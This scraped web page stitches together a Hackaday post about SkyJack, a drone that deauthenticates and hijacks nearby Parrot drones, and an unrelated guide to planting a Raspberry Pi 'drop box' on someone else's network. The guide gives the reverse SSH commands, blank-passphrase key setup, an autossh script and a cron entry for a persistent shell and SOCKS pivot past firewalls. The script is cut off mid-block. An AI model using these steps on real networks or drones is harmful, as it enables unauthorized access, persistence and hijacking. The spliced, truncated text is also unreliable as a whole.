HACK A DAY
Fresh hacks every day
SUBMIT A TIP
DECEMBER 6, 2013
SkyJack: A Drone to Hack All Drones
December 6, 2013 by Josh Marsh 9 Comments
Quadcopters are gradually becoming more affordable and thus more popular; we expect more kids will unwrap a prefab drone this holiday season than any year prior. [Samy’s] got plans for the drone-filled future. He could soon be the proud new owner of his own personal army now that he’s built a drone that assimilates others under his control.
The build uses a Parrot AR.Drone 2.0 to fly around with an attached Raspberry Pi, which uses everybody’s favorite Alfa adapter to poke around in promiscuous mode. If the SkyJack detects an IEEE-registered MAC address assigned to Parrot, aircrack-ng leaps into action sending deauthentication requests to the target drone, then attempts to take over control while the original owner is reconnecting. Any successfully lassoed drone doesn’t just fall out of the sky, though. [Samy] uses node-ar-drone to immediately send new instructions to the slave.
You can find all his code on GitHub, but make sure you see the video below, which gives a thorough overview and a brief demonstration. There are also a few other builds that strap a Raspberry Pi onto a quadcopter worth checking out; they could provide you with the inspiration you need to take to the skies.
967 total views, 1 views today
SSH Phone Home: Using the Raspberry Pi as a proxy/pivot (Shovel a Shell)
In this section I’ll cover setting up a Raspberry Pi to send you a Reverse Shell using SSH (AKA: Shovel a shell). This is pretty good for blowing past NAT and some firewalls with weak egress filtering. The idea is that you can use these as drop boxes to leave behind on someone else’s network, then have them remote back out to you. These instructions should work pretty much the same on any *nix device or distro that uses OpenSSH. Make sure you have OpenSSH installed, but most distros I’ve seen do.
ssh -R 1974:localhost:22 [email protected]
ssh -D 1080 -p 1974 [email protected]
The above command also opens up a SOCKS port on you local PC host that you can use to tunnel traffic into the Raspberry Pis’s network with.
Ok, the commands above were just to do it manually, how about automating the shell shoveling? I based my work on Brandon Hutchinson’s script for automating the SSH reverse connection every 5 min, so check out his site.:
Here are the steps:
1. SSH Keys Setup
Do the following on the Raspberry Pi, but replace “root” with the username on your home PC (I use home.irongeek.com in these examples)
ssh-keygen -t rsa
Use a blank passphrase. This next line is to copy of the key to the PC
cat ~/.ssh/id_rsa.pub | ssh [email protected] “cat – >> ~/.ssh/authorized_keys”
2. Reverse SSH Automatic Script
Make a script called “autossh” on the Raspberry Pi with the contents of this script, replacing the parameters in green as needed:
# Based on http://www.brandonhutchinson.com/ssh_tunnelling.html
# $REMOTE_HOST is the name of the remote system
# Setting my username for home box, you will most likely want to change this
# $REMOTE_PORT is the remote port number that will be used to tunnel
# back to this system
# $COMMAND is the command used to create the reverse ssh tunnel
COMMAND=”ssh -q -N -R $REMOTE_PORT:localhost:22 [email protected]$REMOTE_HOST”
# Is the tunnel up? Perform two tests:
# 1. Check for relevant process ($COMMAND)
pgrep -f -x “$COMMAND” > /dev/null 2>&1 || $COMMAND
# 2. Test tunnel by looking at “netstat” output on $REMOTE_HOST
ssh $REMOTE_HOST netstat -an | egrep “tcp.*:$REMOTE_PORT.*LISTEN” \
> /dev/null 2>&1
if [ $? -ne 0 ] ; then
pkill -f -x “$COMMAND”
and set it as executable with:
chmod 755 autossh
3. Use the “crontab –e” command on your Raspberry Pi to schedule the script to run every 5 min. The entry will be something like:
*/5 * * * * /home/pi/autossh
SSH Automatic Script
4. Now go to you home PC and you should be able to use this command to connect to the waiting shell:
ssh –D 1080 -p 1974 [email protected]
Use port 1080 on the localhost for tools that will work with a SOCKS proxy and tunnel traffic into the remote network.
1,334 total views, 1 views today